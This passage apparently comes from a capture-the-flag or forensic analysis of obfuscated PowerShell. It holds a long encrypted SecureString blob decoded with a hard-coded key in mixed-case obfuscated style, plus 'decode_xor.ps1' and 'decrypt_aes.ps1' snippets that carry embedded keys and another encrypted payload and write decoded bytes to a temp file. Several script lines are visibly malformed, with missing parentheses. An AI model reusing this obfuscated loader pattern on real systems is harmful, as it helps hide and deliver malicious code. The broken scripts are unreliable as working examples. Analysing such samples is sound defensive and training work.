AA4ADUAYgAxAGUAYwBiAGEANwBlADYAZQAxAGEAZgBiADUANgA3AGEAYQA1ADQANAA1ADgANABlADQANAA5ADYAMgBlADQAZAA5ADgAOAAyADcANAAxAGMAZABiADEAZAA1ADgAZgBkAGEAMgBlADkAZQBhAGMANQA4ADAAYgA0AGMANAAyADgAMgAyAGEAZQA3ADgAOQBlADEANwBlADEAMgBhADEAYQA3AGYAZQBhAGUANwBmADkAZgA1ADUAZAAxADQAZQAwAGIANQA3AGYAZgA5ADEAZQA5AGQANQAzAGIAZQBiADAAOQBiADYANABmADAAOQBkADIANABkAGQANwAzADIAZQBlADEAOQBiADUAZQA0AGQAMABkAGIAYQBiADgAOQBkADkAMQA1ADgAOQAwADQAYgA3ADQAYQA0AGYAMwA1ADEAMAA1AGMAZgAxADIANgBjADYAMwAzAGIANQAzAGYANwA2AGQAYwA5AGQANgBkADkAOQBkADgAMgBmADMAOQA5ADQAZgBiADEANAA5ADYAMwBkADkAYgBjAGEAMQA3AGEAYgAwAGYAMAAxADAANwBiADkAMQAzADYAMgBjADQAMgBmAGUANAAwADEAYwA4ADgAMQA5AGQAMABhAGQANQBiAGUAMwA2ADYAOQA3ADYANABhAGQAYgAwAGEAZgA5ADUAYQAxADUAZAA5ADYAZQAwADgANwA2ADkAYgBmADAANwA5ADYAOQAxADQAZgA0AGQANQBkAGIAZAAxADMAYQA3ADUAMAAxADAANwAzADAANgBlADMAMgAxADMAMQBmAGYAOAA2ADQAOAAwAGMAMQBmADgANgAxADgANQBhADYAOQBjADIANABhAGUAMABkAGUANgAyADMAZABlAGEANgBiAGYAMABlAGEAMAAxADUANQA4AGYANABjADYAZABjAGIAMgA5ADcAZAA0AGUAMQA5ADMAMgA3ADUAZgAyAGEAZAAxADkANAAyAGIAZABkAGMAZQA4ADcANQA5ADcAMwBhADAAZAA2AGIAMQAyAGEAZAA4ADAAYwAxAGMAMgA2AGIAZgA4ADEANQA0ADgAOQBkAGYAZAA2ADQAOABiAGQAYQAwAGYAZgA5AGIAMgAwADQAYQAyAGYAZAA5ADgAOQA1AGQAMgAxADEAYgBiAGMAMgAyADcANABjADQAMgA1AGUAYQBjAGYAZgAyADAAMwAxAGQAOABjAGQAYQAwADYANQA5AGUAMgA4ADYAOQBhADUAZAA1AGUAOQA2ADIAZQAzADgAMgAwADAAOQBkADkAZAAwADcAZgA0AGMAYgA5ADQANwA5AGUAYwBhADUANgBlADMAZgA5ADQAZAAzADgAZgA4AGMAMwA4AGMAOQA0ADYAZAA1ADgAMQBiADgAZQBiADAAYwBhAGEAZAA0ADAAMgA2ADQAMwBiAGUANwAxADUAYwA1ADMAZABhAGQANgA2ADIAYgBkAGIAYwBkAGYAYQBjADcAOQBjADUAMgA3AGMAMwA1ADAANAA3ADQAYgA0ADMAZAA1AGQAZQAzADEANQA2ADcANwA1AGEAZABhADYANgBkADAAMwA3ADcAZgBlAGEAZABlADkANAA4ADQAYwAwADkAMAAyADMANgBmAGUAYwBlAGIAYQAwADkAYQBjAGUAMgBlADcAZgBkAGIAMgBmADUAMgBmADUAYQA1ADcAMQAzADIAMwBmAGYAYwBkADEAMwAxAGYAMwA1ADIANABkADgANAA3AGEAYwBkADMAMQAxAGYANgA3ADUANgBlAGEANgAyADAAZQBhADcAYwBkADUANgBlAGUAMQA3ADcAMABmADUAMgBjADQAYQBkADMAMwBlADIANABkAGQANAAyADAAMwA2ADkAMAA4ADUAMwAyADcAMQAwADIAMQAzAGMAZAA4AGUAYQBiADMAMQAzADQAMwA1AGEANAA4AGYAZQBlADIAOAAyADMAZgAwADEANgBkADAAYQA4AGYAMgBiADgANgBmAGQANAAzADMANQA0ADcAZgBkADkAOAAxADQANgA4AGMANwA1ADAAOQBiADMAYQAxADMANQAxAGEAOABjAGYAYgA4ADEAMAA3AGYANQAzADkANwBmADcAMwA5AGYAMgA2AGQANABlADgAZgA3AGUAMABiADYAYQBkADAAYwBjADcANAAyADEANgAyADMAYwAxADIANQA2AGQAMgA2AGYANwA0ADUAZgA4ADYAZAAwADQAMAAxADAAYgA1ADEAMAAwAGYAOQBhADAAMQBkADkAZABiADYANABjADEAOQBiAGYAYgBlADUANwBmAGMANQA3AGUAZgBiAGEANgA5AGEAMwBhADQANgA5ADAANgAyADUAMAAyAGUAZgA3ADQANwA2ADcAMAAyADUANgA2ADUANAA4ADgAYgBiADkANAA0AGYAZQBlADgANQBhADAAYgBhAGIAYQA4ADAAMwAxADQAYgBkADkAZABkAGUAMQAzADUAMQBkAGUANgBhAGEAZQBlAGUAYgBlADcAYQAyAGMAYQA3ADAANgA3AGMAMQA3ADgAYwA0ADQAMQAzAGEAZABhADIAZAA5AGEAYQBiADcAZgAyAGMANQAwAGUAZQBlADkAMQBmAGUAYwAyADEANQAwADkANAA1ADgAOABmADcAMQA0ADQAYwA5ADkAZABmAGYANAA5ADQAYwA5ADcAYgAxAGYAOQA3AGIAMwBhAGYANwA5ADMAMgAxADIAYQBjADYAMQAxAGMANAAyADYANwA3ADkAMQBiAGUAYQA3AGIAMQAxAGUAMAAyAGQAMgAwADUAZABkADIAYQBhADgANgBmADEAOAA1AGIAOQA0AGMAYwBlADYAMABmADAAZQAzADMAMQAyADYANwAzADYAYwBmAGQAYwBmAGQANwBjAGYAZQBmADYANwA3AGEAZgA4ADgANgA3ADcANQBiADQANQA4ADEAMwA5ADAAOQA0ADMAZQAxADUAZAA4AGYAYgA0ADYANgAwAGIAMAAxADIAZQBlADIAMQA3ADkANQA2ADUAZgBmAGUANwAxADcAYwBmADcAOAA3ADcANwBiAGYAMQBjADUAMAA2ADUANAA2ADcAOAA0ADkANwAzADgAYQBmAGUAZAAyADgAYwAwAGQAOAAzADMAMQA2AGUAMwA4AGQAMgBiADYAYwAwADgAOQA0ADYAZgBjADcAMwBjADUAMgA2AGQAOQAwADIAZQAxAGQAMABiADgAMgBjADMANwA1ADUAYwAyADYAMgBmADMAMwA4AGEAOQAwADAAMwA5ADAAMwAyADkAMAA1ADAANQBiADgAYwBjADYAMABjAGIAMQAwAGIAOABiAGMAMAAzADEAYQBjADIAMQA1AGUAMAA0ADQAYQAxADAAMAA5ADMAYgBlAGQAMwBiAGQAMABjADEAZABmADMAMAA2ADMAOAA3AGEAZQA5ADMANwBkAGEAYQA2AGQAMAAzADIAOABjADMANwAzADgAZABlADUAYQAxADMAZgBkAGIAOAA3ADYANAA3ADYAZABkAGUANQA1ADgAYwBjADEAMAA0AGEANgA0ADMAYgBhADgANgAzADUAZAA4ADMANgA3ADIAZABjAGIAZQAzAGYAMgBkADkAMgBjADgANABkADYANwA5AGUANgA1AGQAMwA5ADcAOAAzAGUAOQBmAGUAYwBiAGUAZAA2AGEAMwAwADcAMAA5AGMAYgAxADMAYgA0ADQANwAzADYANQAwAGIANwA2ADIAMwAxADIANgBlADEAZABkADUAZQBjADMAMgBmADIANAA5ADgANwBhADAANAAyADcAOABhAGUAZQBiADgANwBiADkANwA5AGUAZQA0AGEANQA0ADAAOQAxADYAZgAyADYANQBjADAAMQA1AGEANABiAGYAYQAyAGIAMwA5ADEAZQBmAGQANQA5AGYAYQA2AGEAYwAxADMAOQBhADgANwAwAGYAMgAxADcAMgAwADAAOAA3ADMAMwA4ADAANgA1AGQAYQBlADUANgA3AGEANgA0ADAANgA2ADIAZgAwAGUAMAAyADUAOAA1ADcANAAxADMAMQA5AGMAYwA5ADAAOQAzAGIAOQA4ADIAMAA4ADIAYgBkADkAYwBmAGIAZgA4AGMAOABiADcANgBjAGYAZQBkAGEAZQBlADkAOAA0ADEAMgBlAGUAMABmADUAMQA0ADYAYQA4ADMAMQAyADMANwAzADQAOAAwAGQAZABlADQAZQAxADkANABmADUAZABlADUAYgAzADUAMQA2ADMAOAA4ADYAYQBjAGIANwBmAGMANwAwADgANABkAGQAYgA1ADYAOABkADgAOQAyADkAMgA0ADkANwA2ADgAMwBhADcAZABmADEAMwBlAGUAYwAyADEAZQBiADcAZQAxAGYAYwBlADcAYwBlADIAOAAyADUAOQBjADQANwBmADIAYwBjADkAYgA2ADcAYwAyAGMAMgA4ADUANwAyADkAYgA1ADEAMQAyADAANQA0ADIAYwA1ADAANwAxADcANAA4AGEAMgA5ADUAMQA1AGMAMwAyAGQAZQA1ADEAMgAyADEANQBiADkAZAA1AGYAYwA4ADMAMAA0ADkANQA3ADQAMAAyAGUAMABiADIANgBmADcAOABkAGUAMgAwAGYAOQAxADIAMgA0ADMAMgAyAGYAMQAxADcAZgAwADEAZAA0ADYANABhAGYAOAA0AGMANAAwAGMAMAA0ADQANQA2ADcAYwA4ADMAOQA1ADMAMABmADQAYQA2ADkAYwAxADkAMQBhADcAOQBjADAAMwBmAGYAOQAxAGEANQAxADYANwA1ADQAYQAxAGEAMwAzADgAYQA1ADcANgA5ADkAMAAxAGUAOQAxADEAZgBlAGYAZAAxAGIAZQAzADgAZAAxAGUAOABmADQAZQA4AGIAZAA1AGIAOQA4ADYAMgBiAGEAOABiAGYAYwAyADEANQAzAGUAYQA1ADMAYgBmADkANQBhADMAYQA1ADQANgA4ADMANQBkADcANAA2ADAAZgAwADUAYwBkADUAOQA4AGIAZAA2ADkANAAxAGEAYgBlAGMAOQBmAGEAZgA2AGYAMgA1ADkAZQA3AGYAYgBiAGMAOQA3ADYAMwAyAGMANwAzAGYAZAA5ADgANwBkADMANgAwADkANwA1AGYAZAA3ADkAMgAwADUAYgA1AGYANAA0AGQAZgAxADIAYgAyADMAMQBkADEANAAyADQAZQA4ADQAMwA0AGEAZgAwADcAMgBiADAAZQBkAGQANgAyAGUAZgAwAGUAZABjAGIAZgA4AGIAMAA5ADEAMQAxAGQAYwBlADMANwA5ADgAZAA2ADIAMgA0ADEAZQA2AGMAYgBmADQANgBlADkAYwBmADkANABjADcAOAA5AGIAYwBjADYANwBlADYAYwA3AGQANwA3AGIAZAAxADgAOQBiAGQANgA0ADMANgA5AGMAMgA3ADgAYQA0ADgAYgBjADcAMwA2AGEAYQBhADUAYQA0AGMANABmADQAMwBkADUAZQA3AGMAMQBkADEAMgAxAGEAMAA1AGUANQBlADIAYwA1ADkAOAAyADIANgA1AGYAMwBjADcAZQAyAGEAYgA0ADYAYQBhADMANgBhADgAMQAwADUAZgBhAGMAMgBiADkAOABmADEAYQA2ADgAYgA2AGEAOQBkADIAYwAyADMAZAAzADkAOQA4AGQANwAxAGUAZgA0ADcANwBkAGMAOQA0ADUAZQA3ADAAYgAyAGEAMwAzAGUAOQBjADcAZQA2ADIAZgA4ADkAOQAwAGIAZABkAGMAMwA5AGMAMQBhADkAMwAwAGYAMwBjAGQAMgA3ADcAYQA0ADMAOAAzAGQAYwA2ADEAOAA0ADUANABmAGQAMwBkADYAZQAxAGQANQAwADgANQA3ADkAZgBiADgAOAAyADkAYgBlAGMAYwBiADQAMQAyADEANgBmADcAZAAzADUANgA4AGMAZgA4ADAANwA5AGYAOQBkADMANABkADYANQAwADAAMgBjADcAYwA3AGYAZQA5ADMAMQBkADUAZABhADQANAA3ADgAYwBkADQANgA4ADUAZQA1ADAAMAAwADcANwBhADcAYQA5AGMANgA5ADcAYQA5ADAANQA5ADQAOQA2AGQAZQBlADUAYgA5ADUAMwAxAGEAMwAyADkAZQBjADkAZAAwADcAZQBmADAAMgBhADYANQBmADkANAAzAGQAZAA0ADMANQAwADUAMgBjADUAMABjAGMANgAxADUAMwBhADkAYwA3ADEAMQBjADMAOQA0ADEAZQA1AGEAZQA4AA==' | CoNvERtto-SECUrEStrIng  -K 8,3,173,146,182,87,181,9,67,38,106,106,249,114,100,219,253,11,39,98,162,97,239,119,35,89,106,111,140,75,22,156 ) ).gETNEtwOrKcReDEntiaL().PASSwOrD)

## decode_xor.ps1
$k = 27, 39, 49, 66, 40, 44, 74, 95, 95, 30, 43, 48, 114, 39, 49, 76, 74, 72, 30, 29, 28, 114, 27, 28;


for $i=0; $i -lt $k.Length; $i++ {
        $k[$i] = $k[$i] -bxor $host_[$i % $host_.Length];
}

$tmp = [System.IO.Path]::GetTempPath;

[string] $name = [System.Guid]::NewGuid;

$tmp += $name;

[System.IO.File]::WriteAllBytes$tmp,[Byte[]]$k;
# Zerologon_is_crazy______

## decrypt_aes.ps1
# create aes key - keep this secure at all times
$aesKey = (8,3,173,146,182,87,181,9,67,38,106,106,249,114,100,219,253,11,39,98,162,97,239,119,35,89,106,111,140,75,22,156)
$encrypted = '76492d1116743f0423413b16050a5345MgB8AG0AZwBMAHQASQAzADAAQgBOAGEAQwBMADcAVABRAFgAZABFAFUAWgBqAFEAPQA9AHwAYgAwAGYAYwA4AGEAMABlADUAMgA2ADQAMAA5ADAAYQBlAGMAYgAyAGIAOAA3AGMAOABlAGMAMgAxADkAOQBhADIAZAA0AGIAZAA5AGEANwA2AGUAMwA3ADkAZAA0ADUAMgAzADQAZAAwAGQAYQBiADYAOABmAGEAYQAxADgAZABmAGEAMgA2ADQAYwBkADAAYwA1ADIANQA1ADQAZgAwADIAOQAwAGMAZQAyADMANwBiADgAMQA5ADEAOQA3AGUANgA1ADkAMgBmAGEAMwBmAGMAMQBmADkAMwAzADQAZgBiADkAMgBiADYANwA5ADUAOQA0ADQAZQBkADMAYwA3ADQANAAwADAAZgA4AGIANgAwADIAYQBkADEAMgA3ADIAYwBiAGIAZAAwADUANwA1ADgANgBiADgAMgAyADIAMAAwAGYAMQA2AGQAOAAxADAANQAzAGUANgA1ADMANQBjADYAOQA4ADEAMwAyADgAOAA0ADkAMAA0AGEAYQAwAGMAMgBlADYAMQBkADAAMgBkADUANgBmAGIAYwBjAGQANQAxADYAOABlADkAYgA2ADEAYgBjAGQAMQA0ADQAMgA4ADAANQBlADkAMwA5AGUAOQAzADAAYQA3AGYAZAAwAGEANQBmADcANABhAGEAYgA2AGYAYwA4ADEAZABjAGEAMwBmAGMANwBkAGQAMwAzADYAZQBiADIAZQBlADUAOQAzAGIAYwA3ADAANQBiADEAZABiADUAZQAyAGIAZQBmADAAMQA3AGEAZQBhADAAYwA0AGIAZABjAGUAOQBlADcANQBiADgAZgBhAGQANABmADAANwBiAGYANABiAGQAZgAyADMAYQAxADEAYgA1ADgAZgAzADcAOAAxAGUAYgAzAGUAMgAwAGYANgA1ADIAMgAyAGUAZgBkADAAZAA2ADUAMABhADgAZgBjAGIANQA2AGMAMgA1ADcAMQBjADkAYwBiADkANABiADkANQA1ADIAZAAxADIAZAA5ADEAMwBlADIAYwAyADkANwAwAGUANAA0ADAAOAAwADMANQBlAGUANAAxADUAZABmADUAZgBhADMANAA4ADkAZgBjADQAMwA0ADAAOQA2ADAANgAxADIAZQBlAGMAOQA2ADIAOQA0ADgANQA0ADMANwA1ADAAYwA1ADYAOQBmADEAZABiAGYAMQA4AGUANAA4AGMAMQA5ADAAZAA2ADUAYgAyADgANgA3AGYAYgBjADcAZgAyADMAYwA2AGUAYwA3AGUAZQBmADgAMwAzAGMAMgA2ADkAZQAxAGEAMAA1ADkAMgBkADEANgAyAGIAMAA4AGIAOAA5ADIAMQBiAGEANABiADEAOABjAGQAZgBmAGYAYQAwAGYAMwBmAGMAMQAwADUAZgBiAGYANABlADQAZgBmADcAOABjAGUANwA2AGEAMwA1ADAAZgAwAGQAYgA1ADQAMQA4AGYAYQA3AGEAZQA0ADYAYgAyAGUAZQA0ADgANAA0ADkAMQA5ADkANAAyAGQAYQBhADAAZAA4ADYAZQA5AGMAMgA0AGYAZgA4AGEANwAwADgANQA2AGUAOQBkADEAZgA2ADQANgAzAGQAZgAwADUAYwA3ADIAMABjADcAYwBlADMAOQAyADIAZQBhAGQAYQBlAGQAMgA0AGIAMgBlAGQAOQBiADUAMAA4AGYANQA4ADAAZQA5ADUAMgBmAGEAMgAyADkAMwA2AGIAMQAyADYANwA3ADUAOABmAGEAZQA1ADkANQA2ADIAOAAxADgAMQA4ADYAMgAyADQAOAAxAGUAZAAwADMAYgA4ADkAZQA5ADgAMgA1AGYAMgBmAGIANwAyAGYAZgAyAGEANwA5AGMAMwA5AGYAZAAyADUAMwA1ADAAZgAwAGEAYgBlADkAMABlAGIAOAA0AGQAZAA5ADMAMgA0ADEAMQA1AGUAMAA0ADEAMgAyADgAYQA0ADMAZAA3ADAAYwA1AGUAOQBmADQAYQBhADMANQBhADYAOAAxADAAZQA1ADkAOABmADMAMABkAGEAYQBlADAANQAyADUAYQA0AGYAOABkAGMAYwBhAGIAMABjADEAYgAzADkANAAzADMAYwA3AGQAZQA4AGUAYgA5ADEAMABkADIAOQBiADEAYQA1ADkAZAA1AGUAMwA3AGUAOQAyAGUAMQBmADEAOQBkAGUAMAA2AGEAZQAxADkAYQA4ADgANAAzADcANQAyADUAOQA2AGIAOQAxADYANwA3ADQAMQBlAGQAOAA4ADAAOQA0ADUAYgBmADUAOQA2ADgAYwBhAGUAOQAzADMANwA1ADkAZgAyADQAZAA1AGYAZABmAGIAZQBlAGMAMQAxADcAYQA4ADYAMwBjAGEANgA3ADEAMgA3ADYAZgA4AGMAMQBhAGEAZAA2AGEAYQBjADAAMgAwADAAYQA4ADUAOAA3AGQAMwA0ADQAOABmAGEAZgBkADMANABhADYAMQBiADIAMwA1AGUAOAA5ADQANgBlADAANQA2AGIAZABmADQAMQAwADgAMgBiADUAMgBhADUAYQBlADEAYwAzADIAMwA0AGUAOQA5ADMAZQAwADAANwA5ADkAZAA3AGUANwAyADQAOQAzAGQAMwA3ADMANwA3AGYAYwBiAGIANAA4ADcAOQA1AGIANQAxAGMAYwA0ADEAYQBkAGYANQAxAGEANAA2AGEAYwA2AGQAMABhAGIANwBhAGIAZQA1ADYAMQBkAGQAMgBlADMAZgA1AGEAMgBkAGEANgBmAGYAYwA0AGMAMgA4ADQAOQA3ADgAZgA0ADcANAA4ADIAMwA1ADcAZQAzAGEAOQA1ADYAZgAxADIANQA0ADMAMAA2AGIAMQA0AGYANgAwAGYANABkADMANwBhADUANgA3AGEAMAAyADkANAA4ADEAZQA0AGYAOAA4ADEANgAyADEAZABiADgAOABlAGQANAA2AGEAYwBlADMAOAA1ADUANgAzAGEAMwA5AGEAMAA5ADMAZAA2ADAANwBjAGMAZQA3AGIAOAAxADUAYQAwAGYAOAA0ADEAZQBjADMAOQAwAGIANQA5AGMAYwAxADQAMwBlADQAZABlADkAZAAwAGEAMgA3ADkANgBiADQAYgBjADAAYgBlADEAMwBjADIAOABiAGYAMQA4ADIANABiADMAZQBkAGIAMABkAGQAZABiAGQANgAwAGQAOAA0ADEANwBhADgAMgA2AGIAZABhADYAOQAwADQANwAzADUAZgA4ADEAMQBlAGYANgAxADEAZQA2AGMAMAA3ADUAZgA5ADQANABmAGMANQAzAGYAMAA2ADEAZQBiAGYANwA1ADkAZAAxAGUAYwA2ADkANABkAGEAMgBhAGUANwAwADcANAAzADAAOQBmAGIAYgBkADUAZABkADEANgA1ADEAOQA0AGQAYgA4ADgAMwBmADQAOQBiADgAMgBiAGEANABhADMAOQBkAGYAMgBkADQANAAxADkAYQA5AGEAMgAzADcANwA0ADQAZAAwAGUANABlADYAYgBlADMANABhAGIAZQA4ADMAOQA4ADMAYgA4ADkANQAyAGUAMABjADkAOAAwADMAYgAwADEAYgA1ADYANwBjADcAZABiADQAOAAxADgAOAA4AGMAYQA3AGMAOQA1AGUANAA4ADEANgBiADcAOQBkADMAMgA3ADIANAA2ADUAZQAzADcAZgBkADAAZQA3AGUANgBmADMANQAyADEAZABiAGMANwA5ADIAZABlAGYANQAyADIAYwA3ADQAYgA4ADUAMAAzAGUANABlADAAOQAyADIAZAAwADUAZQBmADcAZABhADIAZgA4ADAANgBhADgANgAwADYANwBhADUAMQBkADQAZQAzAGIAYgAxADYANgA3ADQAYQAwADAAMQBhADMANgBkAGIAYgA1AGMAMABhAGIAYgAwADcAZgBiADIAZQBmADgANAA5ADEAZAAwADAAYQA5AGUAMQA0ADEANwBmADUAMABkADAANwAxADIAOQAxADYAYwBjAGYAZgAxADcAYwA3AGMAMABjAGEANgBjADUAOAA0ADYAOQBkAGMAYQBmADQAZABlADYAMQBkADIAOQA1AGQANwAyAGYAYwBkADYAZgAwADMAZgBhADIANQBlAGEANQBiADYANAAxADgANQAyADIANAA0ADQAYwAxADMANQAyADkAOQAzADcAZQAzADcANgAwADQAYQA0AGEAYwA0ADIAOABhAGQAOQBiADUAYQBhADgAOAAxADYAYQBiAGMANwA4ADMANwBkAGQAMABkAGQAYwA5ADAAOQAyAGQAZQA5AGUAZQBiAGIAMgAxADIAZABkAGEANwA4ADQAZQBlADQAZAA5ADUAZAA3AGQAYgA3ADUANgBjADgANAA2ADgAZgA1ADQAMgA1ADkAMQA0ADEAYgBjADAAZAAzADAANwAzAGIAYwBhADAANgAyADcAMAA3ADUANQA3ADQAYQAzADEANQAwADIAMgAwADAAOAAzAGMAOAA1AGEAMAAzADEANQAzADMANAA4ADMAMgA4AGYAOQAzADQAOAA5ADYANgBjADIAMQAwAGQAOAA1AGIANgAzAGEAZAA0ADYAMQA3AGMAZQA3ADkAZABmADUANwA0ADIAYwBmADgANgA4AGIAMAA1AGEAMgA3ADcANQBiADEAYQA1ADAANABmADkAZgA1ADcANQA3AGUANgA1ADkAMQAzAGIANABmADYAOQAwADIAZAA3AGQANgA0AGMAZQBjAGIAOQA0ADYAZgBlAGQAOQAwADYAZAA0AGQAOQBmADMANAAyADMAOQBlAGUAMQAwADEAYgBjADMAOABiAGYAYgBjAGIAMABjADEAZQAyADMAYgBjADUAZAA1ADYAMAA5ADcANAAzADIAYgBkAGYAYQA0AGEANgBkADcANgAyAGUAMwA1AGYANgAwADgAYQBiADYAMgBmADgANwBmADMAOABkAGEANABkADAAYgBhADYAYgBjAGEAOAA3ADkAMAA4ADQAOAAwAGQANQA2ADUAZgAyADMAMQBkAGUAMQAwADMAZABkAGYAOABiAGEAYgAxADgAOQA0ADcAMwAwADgAOQA3AGYAMgAzADAAMABlADUAZQAwADYAOAAwAGIAYwA1AGUAZQBjAGUAYgAwADUANQBmADgAMAA2AGYANQBhADIAYQBmADcAYQAxADgAZgAxADEAZQA2AGEANwBjADUANQBmADAAYgBlADAAZgBiADcAOQA2ADgAYwA3ADIAZgA5ADYANwA3AGEAMwBkADUAMgBlAGQAYgA0AGIAZQA4AGUAMwA5ADIAYQA1ADAAYwA5ADQANwAxAGMANwA2ADMANABjADEAZAA4ADUAMAA4AGYAYgA2AGMANQAwADEANQBiADkAYwAyADgAYwBiADYAMQBiADgAYgA3ADkAOQA0ADIAYQBlADEAMQBlADYANwA1ADEAOAA4ADUAYgAxAGUAYwBiAGEANwBlADYAZQAxAGEAZgBiADUANgA3AGEAYQA1ADQANAA1ADgANABlADQANAA5ADYAMgBlADQAZAA5ADgAOAAyADcANAAxAGMAZABiADEAZAA1ADgAZgBkAGEAMgBlADkAZQBhAGMANQA4ADAAYgA0AGMANAAyADgAMgAyAGEAZQA3ADgAOQBlADEANwBlADEAMgBhADEAYQA3AGYAZQBhAGUANwBmADkAZgA1ADUAZAAxADQAZQAwAGIANQA3AGYAZgA5ADEAZQA5AGQANQAzAGIAZQBiADAAOQBiADYANABmADAAOQBkADIANABkAGQANwAzADIAZQBlADEAOQBiADUAZQA0AGQAMABkAGIAYQBiADgAOQBkADkAMQA1ADgAOQAwADQAYgA3ADQAYQA0AGYAMwA1ADEAMAA1AGMAZgAxADIANgBjADYAMwAzAGIANQAzAGYANwA2AGQAYwA5AGQANgBkADkAOQBkADgAMgBmADMAOQA5ADQAZgBiADEANAA5ADYAMwBkADkAYgBjAGEAMQA3AGEAYgAwAGYAMAAxADAANwBiADkAMQAzADYAMgBjADQAMgBmAGUANAAwADEAYwA4ADgAMQA5AGQAMABhAGQANQBiAGUAMwA2ADYAOQA3ADYANABhAGQAYgAwAGEAZgA5ADUAYQAxADUAZAA5ADYAZQAwADgANwA2ADkAYgBmADAANwA5ADYAOQAxADQAZgA0AGQANQBkAGIAZAAxADMAYQA3ADUAMAAxADAANwAzADAANgBlADMAMgAxADMAMQBmAGYAOAA2ADQAOAAwAGMAMQBmADgANgAxADgANQBhADYAOQBjADIANABhAGUAMABkAGUANgAyADMAZABlAGEANgBiAGYAMABlAGEAMAAxADUANQA4AGYANABjADYAZABjAGIAMgA5ADcAZAA0AGUAMQA5ADMAMgA3ADUAZgAyAGEAZAAxADkANAAyAGIAZABkAGMAZQA4ADcANQA5ADcAMwBhADAAZAA2AGIAMQAyAGEAZAA4ADAAYwAxAGMAMgA2AGIAZgA4ADEANQA0ADgAOQBkAGYAZAA2ADQAOABiAGQAYQAwAGYAZgA5AGIAMgAwADQAYQAyAGYAZAA5ADgAOQA1AGQAMgAxADEAYgBiAGMAMgAyADcANABjADQAMgA1AGUAYQBjAGYAZgAyADAAMwAxAGQAOABjAGQAYQAwADYANQA5AGUAMgA4ADYAOQBhADUAZAA1AGUAOQA2ADIAZQAzADgAMgAwADAAOQBkADkAZAAwADcAZgA0AGMAYgA5ADQANwA5AGUAYwBhADUANgBlADMAZgA5ADQAZAAzADgAZgA4AGMAMwA4AGMAOQA0ADYAZAA1ADgAMQBiADgAZQBiADAAYwBhAGEAZAA0ADAAMgA2ADQAMwBiAGUANwAxADUAYwA1ADMAZABhAGQANgA2ADIAYgBkAGIAYwBkAGYAYQBjADcAOQBjADUAMgA3AGMAMwA1ADAANAA3ADQAYgA0ADMAZAA1AGQAZQAzADEANQA2ADcANwA1AGEAZABhADYANgBkADAAMwA3ADcAZgBlAGEAZABlADkANAA4ADQAYwAwADkAMAAyADMANgBmAGUAYwBlAGIAYQAwADkAYQBjAGUAMgBlADcAZgBkAGIAMgBmADUAMgBmADUAYQA1ADcAMQAzADIAMwBmAGYAYwBkADEAMwAxAGYAMwA1ADIANABkADgANAA3AGEAYwBkADMAMQAxAGYANgA3ADUANgBlAGEANgAyADAAZQBhADcAYwBkADUANgBlAGUAMQA3ADcAMABmADUAMgBjADQAYQBkADMAMwBlADIANABkAGQANAAyADAAMwA2ADkAMAA4ADUAMwAyADcAMQAwADIAMQAzAGMAZAA4AGUAYQBiADMAMQAzADQAMwA1AGEANAA4AGYAZQBlADIAOAAyADMAZgAwADEANgBkADAAYQA4AGYAMgBiADgANgBmAGQANAAzADMANQA0ADcAZgBkADkAOAAxADQANgA4AGMANwA1ADAAOQBiADMAYQAxADMANQAxAGEAOABjAGYAYgA4ADEAMAA3AGYANQAzADkANwBmADcAMwA5AGYAMgA2AGQANABlADgAZgA3AGUAMABiADYAYQBkADAAYwBjADcANAAyADEANgAyADMAYwAxADIANQA2AGQAMgA2AGYANwA0ADUAZgA4ADYAZAAwADQAMAAxADAAYgA1ADEAMAAwAGYAOQBhADAAMQBkADkAZABiADYANABjADEAOQBiAGYAYgBlADUANwBmAGMANQA3AGUAZgBiAGEANgA5AGEAMwBhADQANgA5ADAANgAyADUAMAAyAGUAZgA3ADQANwA2ADcAMAAyADUANgA2ADUANAA4ADgAYgBiADkANAA0AGYAZQBlADgANQBhADAAYgBhAGIAYQA4ADAAMwAxADQAYgBkADkAZABkAGUAMQAzADUAMQBkAGUANgBhAGEAZQBlAGUAYgBlADcAYQAyAGMAYQA3ADAANgA3AGMAMQA3ADgAYwA0ADQAMQAzAGEAZABhADIAZAA5AGEAYQBiADcAZgAyAGMANQAwAGUAZQBlADkAMQBmAGUAYwAyADEANQAwADkANAA1ADgAOABmADcAMQA0ADQAYwA5ADkAZABmAGYANAA5ADQAYwA5ADcAYgAxAGYAOQA3AGIAMwBhAGYANwA5ADMAMgAxADIAYQBjADYAMQAxAGMANAAyADYANwA3ADkAMQBiAGUAYQA3AGIAMQAxAGUAMAAyAGQAMgAwADUAZABkADIAYQBhADgANgBmADEAOAA1AGIAOQA0AGMAYwBlADYAMABmADAAZQAzADMAMQAyADYANwAzADYAYwBmAGQAYwBmAGQANwBjAGYAZQBmADYANwA3AGEAZgA4ADgANgA3ADcANQBiADQANQA4ADEAMwA5ADAAOQA0ADMAZQAxADUAZAA4AGYAYgA0ADYANgAwAGIAMAAxADIAZQBlADIAMQA3ADkANQA2ADUAZgBmAGUANwAxADcAYwBmADcAOAA3ADcANwBiAGYAMQBjADUAMAA2ADUANAA2ADcAOAA0ADkANwAzADgAYQBmAGUAZAAyADgAYwAwAGQAOAAzADMAMQA2AGUAMwA4AGQAMgBiADYAYwAwADgAOQA0ADYAZgBjADcAMwBjADUAMgA2AGQAOQAwADIAZQAxAGQAMABiADgAMgBjADMANwA1ADUAYwAyADYAMgBmADMAMwA4AGEAOQAwADAAMwA5ADAAMwAyADkAMAA1ADAANQBiADgAYwBjADYAMABjAGIAMQAwAGIAOABiAGMAMAAzADEAYQBjADIAMQA1AGUAMAA0ADQAYQAxADAAMAA5ADMAYgBlAGQAMwBiAGQAMABjADEAZABmADMAMAA2ADMAOAA3AGEAZQA5ADMANwBkAGEAYQA2AGQAMAAzADIAOABjADMANwAzADgAZABlADUAYQAxADMAZgBkAGIAOAA3ADYANAA3ADYAZABkAGUANQA1ADgAYwBjADEAMAA0AGEANgA0ADMAYgBhADgANgAzADUAZAA4ADMANgA3ADIAZABjAGIAZQAzAGYAMgBkADkAMgBjADgANABkADYANwA5AGUANgA1AGQAMwA5ADcAOAAzAGUAOQBmAGUAYwBiAGUAZAA2AGEAMwAwADcAMAA5AGMAYgAxADMAYgA0ADQANwAzADYANQAwAGIANwA2ADIAMwAxADIANgBlADEAZABkADUAZQBjADMAMgBmADIANAA5ADgANwBhADAANAAyADcAOABhAGUAZQBiADgANwBiADkANwA5AGUAZQA0AGEANQA0ADAAOQAxADYAZgAyADYANQBjADAAMQA1AGEANABiAGYAYQAyAGIAMwA5ADEAZQBmAGQANQA5AGYAYQA2AGEAYwAxADMAOQBhADgANwAwAGYAMgAxADcAMgAwADAAOAA3ADMAMwA4ADAANgA1AGQAYQBlADUANgA3AGEANgA0ADAANgA2ADIAZgAwAGUA